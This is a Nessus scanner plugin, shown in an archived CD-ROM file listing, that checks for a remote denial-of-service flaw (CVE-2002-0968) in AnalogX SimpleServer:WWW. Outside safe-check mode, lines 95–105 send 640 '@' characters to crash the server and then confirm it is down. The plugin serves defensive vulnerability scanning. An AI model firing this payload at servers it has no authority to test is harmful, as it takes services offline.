home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / simpleserverwww_dos.nasl < prev    next >
Text File  |  2005-03-31  |  3KB  |  106 lines

  1. #
  2. # This script was written by Michel Arboi <arboi@alussinan.org>
  3. #
  4. # GNU Public Licence...
  5. #
  6. # Rerefence:
  7. # To: bugtraq@securityfocus.com
  8. # From:"Fort _" <fort@linuxmail.org>
  9. # Subject: Remote DoS in AnalogX SimpleServer:www 1.16
  10. # Message-ID: <20020613122121.31625.qmail@mail.securityfocus.com>
  11. #
  12.  
  13. if(description)
  14. {
  15.  script_id(11035);
  16.  script_bugtraq_id(5006);
  17.  script_version("$Revision: 1.13 $");
  18.  script_cve_id("CVE-2002-0968");
  19.  script_name(english:"AnalogX SimpleServer:WWW  DoS");
  20.  
  21.  desc["english"] = "
  22. It was possible to kill the remote web server by sending 640 @ 
  23. character to it.
  24.  
  25. A cracker may use this flaw to make your server crash continuously, 
  26. preventing it from working properly.
  27.  
  28. Solution : upgrade your software or use another
  29. HTTP server.
  30.  
  31. Risk factor : High";
  32.  
  33.  desc["francais"] = "
  34. Il a ΘtΘ possible de tuer le serveur web sitant en lui envoyant
  35. 640 caractΦres @
  36.  
  37. Un pirate peut exploiter cette faille problΦme pour tuer 
  38. continuellement votre serveur, l'empΩchant de fonctionner 
  39. correctement.
  40.  
  41. Solution : mettez α jour votre logiciel ou 
  42. utilisez un autre serveur HTTP.
  43.  
  44. Facteur de risque : ╔levΘ";
  45.  
  46.  script_description(english:desc["english"], francais:desc["francais"]);
  47.  
  48.  summary["english"] = "Crashes SimpleServer:WWW";
  49.  summary["francais"] = "Tue SimpleServer:WWW";
  50.  script_summary(english:summary["english"], francais:summary["francais"]);
  51.  
  52.  script_category(ACT_MIXED_ATTACK);
  53.  
  54.  
  55.  script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
  56.  family["english"] = "Denial of Service";
  57.  family["francais"] = "DΘni de service";
  58.  script_family(english:family["english"], francais:family["francais"]);
  59.  script_dependencies("find_service.nes", "http_version.nasl");
  60.  script_require_ports("Services/www", 80);
  61.  script_require_keys("www/simpleserver");
  62.  exit(0);
  63. }
  64.  
  65. # The script code starts here
  66.  
  67. include("http_func.inc");
  68.  
  69. port = get_http_port(default:80);
  70.  
  71. if(!get_port_state(port)) exit(0);
  72.  
  73. banner = get_http_banner(port: port);
  74. if (! banner) exit(0);
  75.  
  76. if (safe_checks())
  77. {
  78.   if (egrep(pattern:"^Server: *SimpleServer:WWW/1.[01]", string:banner))
  79.   {
  80.     security_hole(port: port, data:"According ot its version number, 
  81. it should be possible to kill your remote SimpleServer web server 
  82. by sending 640 @ character to it.
  83.  
  84. A cracker may use this flaw to make your server crash continuously, 
  85. preventing it from working properly.
  86.  
  87. Solution : upgrade your software or use another
  88. HTTP server.
  89.  
  90. Risk factor : High");
  91.    }
  92.   exit(0);
  93. }
  94.  
  95. soc = open_sock_tcp(port);
  96. if(!soc) exit(0);
  97.  
  98. send(socket:soc, data:string(crap(length:640, data:"@"), "\r\n\r\n"));
  99. r = http_recv(socket:soc);
  100. close(soc);
  101.  
  102. soc = open_sock_tcp(port);
  103. if(soc) { close(soc); exit(0); }
  104.  
  105. security_hole(port);
  106.